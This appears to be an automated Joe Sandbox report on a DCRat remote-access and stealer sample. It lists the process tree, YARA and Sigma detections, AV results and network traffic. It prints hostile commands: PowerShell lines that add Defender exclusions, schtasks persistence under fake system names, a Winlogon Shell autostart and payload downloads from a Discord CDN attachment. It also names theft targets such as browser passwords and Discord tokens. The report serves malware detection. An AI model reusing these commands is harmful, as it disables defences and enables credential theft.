Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
64AE5410F978DF0F48DCC67508820EA230C566967E002.exe

Overview

General Information

Sample Name:64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
Analysis ID:614288
MD5:9648a5c08366b431006bcf1591f441dc
SHA1:4c6d186bea7a135d5c518c4dafe1b6593c81b336
SHA256:64ae5410f978df0f48dcc67508820ea230c566967e002703c23c67088883b3bf
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected DCRat
Sigma detected: System File Execution Location Anomaly
Sigma detected: File Created with System Process Name
Yara detected Costura Assembly Loader
Creates processes via WMI
Machine Learning detection for sample
Creates files inside the volume driver (system volume information)
.NET source code contains potential unpacker
.NET source code contains very large strings
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Sigma detected: Suspicious Process Parents
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification

Classification

  • System is w10x64
  • 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" MD5: 9648A5C08366B431006BCF1591F441DC)
    • 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" user MD5: 9648A5C08366B431006BCF1591F441DC)
      • 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe (PID: 1956 cmdline: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe MD5: 9648A5C08366B431006BCF1591F441DC)
        • powershell.exe (PID: 5784 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 412 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 4108 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\iasnap\fontdrvhost.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5532 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\comrepl\fontdrvhost.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 792 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\JRFdtWyAvbQxLlvO.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 3948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 4000 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\System Volume Information\Chkdsk\SearchUI.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 2264 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 2460 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PQCfAXDYbo.bat" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WmiPrvSE.exe (PID: 924 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • schtasks.exe (PID: 5440 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
    • schtasks.exe (PID: 5040 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\iasnap\fontdrvhost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
    • schtasks.exe (PID: 1312 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\comrepl\fontdrvhost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
    • schtasks.exe (PID: 3548 cmdline: schtasks.exe /create /tn "JRFdtWyAvbQxLlvO" /sc ONLOGON /tr "'C:\Recovery\JRFdtWyAvbQxLlvO.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
    • schtasks.exe (PID: 3268 cmdline: schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\System Volume Information\Chkdsk\SearchUI.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
    • schtasks.exe (PID: 5560 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • csrss.exe (PID: 2408 cmdline: C:\Recovery\csrss.exe MD5: 9648A5C08366B431006BCF1591F441DC)
    • csrss.exe (PID: 1352 cmdline: "C:\Recovery\csrss.exe" user MD5: 9648A5C08366B431006BCF1591F441DC)
  • JRFdtWyAvbQxLlvO.exe (PID: 5432 cmdline: C:\Recovery\JRFdtWyAvbQxLlvO.exe MD5: 9648A5C08366B431006BCF1591F441DC)
    • JRFdtWyAvbQxLlvO.exe (PID: 5048 cmdline: "C:\Recovery\JRFdtWyAvbQxLlvO.exe" user MD5: 9648A5C08366B431006BCF1591F441DC)
  • SearchUI.exe (PID: 5516 cmdline: C:\System Volume Information\Chkdsk\SearchUI.exe MD5: 9648A5C08366B431006BCF1591F441DC)
  • ShellExperienceHost.exe (PID: 1416 cmdline: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe MD5: 9648A5C08366B431006BCF1591F441DC)
    • ShellExperienceHost.exe (PID: 3576 cmdline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe" user MD5: 9648A5C08366B431006BCF1591F441DC)
  • csrss.exe (PID: 2140 cmdline: "C:\Recovery\csrss.exe" MD5: 9648A5C08366B431006BCF1591F441DC)
    • csrss.exe (PID: 3040 cmdline: "C:\Recovery\csrss.exe" user MD5: 9648A5C08366B431006BCF1591F441DC)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000000.550072018.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000008.00000000.550714016.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000002.00000002.554390785.0000000002CB6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000008.00000000.550360463.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000002.00000002.552452554.0000000000FA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.fa0000.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3cb9d30.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpackMALWARE_Win_DCRatDCRat payloadditekSHen
                  • 0x55542:$x2: DCRat-Log#
                  • 0x49e10:$x3: DCRat.Code
                  • 0x494e2:$v1: Plugin couldn't process this action!
                  • 0x4952c:$v2: Unknown command!
                  • 0x5477d:$v3: PLUGINCONFIGS
                  • 0x555a0:$v4: Saving log...
                  • 0x555bc:$v5: ~Work.log
                  • 0x5497f:$v8: %SystemDrive% - Slow
                  • 0x549a9:$v9: %UsersFolder% - Fast
                  • 0x549d3:$v10: %AppData% - Very Fast
                  • 0x55e9c:$px1: [Browsers] Scanned elements:
                  • 0x55ed8:$px2: [Browsers] Grabbing cookies
                  • 0x55fa4:$px3: [Browsers] Grabbing passwords
                  • 0x56084:$px4: [Browsers] Grabbing forms
                  • 0x5613c:$px5: [Browsers] Grabbing CC
                  • 0x561d6:$px6: [Browsers] Grabbing history
                  • 0x562a2:$px7: [StealerPlugin] Invoke:
                  • 0x562d4:$px8: [Other] Grabbing steam
                  • 0x56322:$px9: [Other] Grabbing telegram
                  • 0x56376:$px10: [Other] Grabbing discord tokens
                  • 0x563dc:$px11: [Other] Grabbing filezilla
                  2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3c59510.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    Click to see the 14 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: "C:\Recovery\csrss.exe" user, CommandLine: "C:\Recovery\csrss.exe" user, CommandLine|base64offset|contains: zx", Image: C:\Recovery\csrss.exe, NewProcessName: C:\Recovery\csrss.exe, OriginalFileName: C:\Recovery\csrss.exe, ParentCommandLine: C:\Recovery\csrss.exe, ParentImage: C:\Recovery\csrss.exe, ParentProcessId: 2408, ParentProcessName: csrss.exe, ProcessCommandLine: "C:\Recovery\csrss.exe" user, ProcessId: 1352, ProcessName: csrss.exe
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton: Data: EventID: 11, Image: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, ProcessId: 1956, TargetFilename: C:\Recovery\csrss.exe
                    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Recovery\csrss.exe" user, CommandLine: "C:\Recovery\csrss.exe" user, CommandLine|base64offset|contains: zx", Image: C:\Recovery\csrss.exe, NewProcessName: C:\Recovery\csrss.exe, OriginalFileName: C:\Recovery\csrss.exe, ParentCommandLine: C:\Recovery\csrss.exe, ParentImage: C:\Recovery\csrss.exe, ParentProcessId: 2408, ParentProcessName: csrss.exe, ProcessCommandLine: "C:\Recovery\csrss.exe" user, ProcessId: 1352, ProcessName: csrss.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: explorer.exe,"C:\Users\user\AppData\Roaming\qwevqjeiqvj.exe",, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, ProcessId: 3496, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, ProcessId: 3496, TargetFilename: C:\Users\user\AppData\Roaming\qwevqjeiqvj.exe
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Recovery\csrss.exe" user, CommandLine: "C:\Recovery\csrss.exe" user, CommandLine|base64offset|contains: zx", Image: C:\Recovery\csrss.exe, NewProcessName: C:\Recovery\csrss.exe, OriginalFileName: C:\Recovery\csrss.exe, ParentCommandLine: C:\Recovery\csrss.exe, ParentImage: C:\Recovery\csrss.exe, ParentProcessId: 2408, ParentProcessName: csrss.exe, ProcessCommandLine: "C:\Recovery\csrss.exe" user, ProcessId: 1352, ProcessName: csrss.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, ParentImage: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, ParentProcessId: 1956, ParentProcessName: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe', ProcessId: 5784, ProcessName: powershell.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" user, CommandLine: "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" user, CommandLine|base64offset|contains: zx", Image: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, NewProcessName: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, OriginalFileName: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, ParentCommandLine: "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" , ParentImage: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, ParentProcessId: 5600, ParentProcessName: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, ProcessCommandLine: "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" user, ProcessId: 3496, ProcessName: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132952004771724513.5784.DefaultAppDomain.powershell
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe', ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5784, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 416, ProcessName: conhost.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 924, ParentProcessName: WmiPrvSE.exe, ProcessCommandLine: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f, ProcessId: 5440, ProcessName: schtasks.exe
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeMetadefender: Detection: 29%Perma Link
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeReversingLabs: Detection: 57%
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeAvira: detected
                    Source: C:\Users\user\AppData\Roaming\qwevqjeiqvj.exeAvira: detection malicious, Label: TR/Blocker.aastp
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeAvira: detection malicious, Label: TR/Blocker.aastp
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeAvira: detection malicious, Label: TR/Blocker.aastp
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeAvira: detection malicious, Label: TR/Blocker.aastp
                    Source: C:\Windows\SysWOW64\comrepl\fontdrvhost.exeAvira: detection malicious, Label: TR/Blocker.aastp
                    Source: C:\Windows\SysWOW64\comrepl\fontdrvhost.exeAvira: detection malicious, Label: TR/Blocker.aastp
                    Source: C:\Recovery\csrss.exeAvira: detection malicious, Label: TR/Blocker.aastp
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeReversingLabs: Detection: 57%
                    Source: C:\Recovery\csrss.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\Recovery\csrss.exeReversingLabs: Detection: 57%
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Roaming\qwevqjeiqvj.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\Users\user\AppData\Roaming\qwevqjeiqvj.exeReversingLabs: Detection: 57%
                    Source: C:\Windows\SysWOW64\comrepl\fontdrvhost.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\Windows\SysWOW64\comrepl\fontdrvhost.exeReversingLabs: Detection: 57%
                    Source: C:\Windows\SysWOW64\iasnap\fontdrvhost.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\Windows\SysWOW64\iasnap\fontdrvhost.exeReversingLabs: Detection: 57%
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeReversingLabs: Detection: 57%
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\qwevqjeiqvj.exeJoe Sandbox ML: detected
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeJoe Sandbox ML: detected
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeJoe Sandbox ML: detected
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeJoe Sandbox ML: detected
                    Source: C:\Windows\SysWOW64\comrepl\fontdrvhost.exeJoe Sandbox ML: detected
                    Source: C:\Windows\SysWOW64\comrepl\fontdrvhost.exeJoe Sandbox ML: detected
                    Source: C:\Recovery\csrss.exeJoe Sandbox ML: detected
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.6:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49723 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49725 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49729 version: TLS 1.2
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: protobuf-net.pdbSHA256 source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmp
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554257510.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000011.00000002.671633909.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, JRFdtWyAvbQxLlvO.exe, 00000013.00000002.672488180.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, JRFdtWyAvbQxLlvO.exe, 00000013.00000002.672938172.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, JRFdtWyAvbQxLlvO.exe, 00000013.00000002.673039261.0000000002C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
                    Source: csrss.exe, csrss.exe, 00000011.00000002.659651499.0000000000352000.00000002.00000001.01000000.00000009.sdmp, csrss.exe, 00000011.00000002.671633909.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, JRFdtWyAvbQxLlvO.exe, JRFdtWyAvbQxLlvO.exe, 00000013.00000000.575873581.00000000006E2000.00000002.00000001.01000000.0000000A.sdmp, JRFdtWyAvbQxLlvO.exe, 00000013.00000002.672085337.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, SearchUI.exe, SearchUI.exe, 00000015.00000000.576664320.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp, csrss.exe, 0000001C.00000000.590216084.0000000000842000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553830530.0000000001199000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.690420985.0000000007F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 00000016.00000002.672141586.000000000499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.672127271.000000000556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.673640958.00000000050EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554257510.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000011.00000002.671633909.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, JRFdtWyAvbQxLlvO.exe, 00000013.00000002.672488180.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.664966995.0000000004861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.671410119.0000000005431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.671010760.0000000004FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
